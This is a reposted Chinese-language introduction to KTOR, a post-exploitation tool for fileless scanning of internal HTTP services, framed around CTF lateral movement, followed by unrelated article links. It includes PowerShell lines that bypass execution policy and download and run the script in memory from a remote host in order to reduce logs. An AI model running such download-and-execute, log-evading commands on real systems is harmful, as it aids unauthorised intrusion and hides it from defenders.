当前位置: 首页 > ds >正文

KTOR for windows:無文件落地HTTP服务扫描工具

地址:https://github.com/MartinxMax/KTOR

介紹

KTOR 是一款專為 Linux 橫向滲透設計的工具。透過該工具,您可以快速掃描內部 HTTP 服務,以便進一步進行網路滲透,並實現無檔案落地(fileless)掃描。

在 CTF 中,通常需要利用本機其他埠口的 HTTP 服務或其他主機上的 HTTP 服務來橫向移動並提升權限。

當取得目標機器的低權限後,通常會對內部網路進行進一步的探測;然而透過埠口轉發再進行掃描會相當耗時。為了解決這個問題,KTOR 可用來預先探測存在 HTTP 服務的主機,有效減少日誌產生。

KTOR for Windows

PS> Set-ExecutionPolicy Bypass -Scope Process -Force;.\ktor.ps1

wimage.png

掃描當前主機HTTP服務

PS> iex "& { $(iwr http://192.168.0.106/ktor.ps1 -UseBasicParsing) } -Local"

wimage-1.png

掃描其他主機HTTP服務

PS> iex "& { $(iwr http://192.168.0.106/ktor.ps1 -UseBasicParsing) } -Targets 192.168.0.106 -Ports 80,8080,8000"

wimage-2.png

http://www.xdnf.cn/news/5493.html

相关文章:

  • 【Bootstrap V4系列】学习入门教程之 组件-表单(Forms)高级用法(二)
  • 教育行业的 RAG 落地:个性化学习助手设计
  • 【Linux基础】网络相关命令
  • Client 和 Server 的关系理解
  • Yocto项目实战经验总结:从入门到高级的全面概览
  • 大模型Embedding模型介绍与使用
  • [CANN] 安装软件依赖
  • 数仓-可累计,半累加,不可累加指标,是什么,举例说明及解决方案
  • 前端面试题:说说你对 Vue 中异步组件的理解
  • jetson orin nano super AI模型部署之路(十)使用frp配置内网穿透,随时随地ssh到机器
  • 单词怎么记:以use一词为例
  • Java中Comparator排序原理详解
  • 3. 无重复字符的最长子串(滑动窗口)
  • 客户端建立一个连接需要占用客户端的端口吗
  • NHANES稀有指标推荐:HALP score
  • average per-pixel disparity error: EPE及不同距离值下的误差曲线
  • JavaScript基础-全局作用域
  • 《Python星球日记》 第53天:卷积神经网络(CNN)入门
  • DNS服务实验
  • 土耳其Koç大学指令驱动的智能综述,从文本表达到任务执行的系统探索
  • 王慧文产品课总结
  • @Transactional注解失效
  • 仿制药研发为何要上电子实验记录本?
  • 数据在内存中的存储
  • 配置高级相关
  • Open CASCADE学习|B 样条曲线拟合优化
  • 探秘 Canva AI 图像生成器:重塑设计创作新范式
  • vs python“““标记注释报错,vs使用自带环境安装 python第三方库
  • 每日一题洛谷T534125 合数c++
  • C# 方法(ref局部变量和ref返回)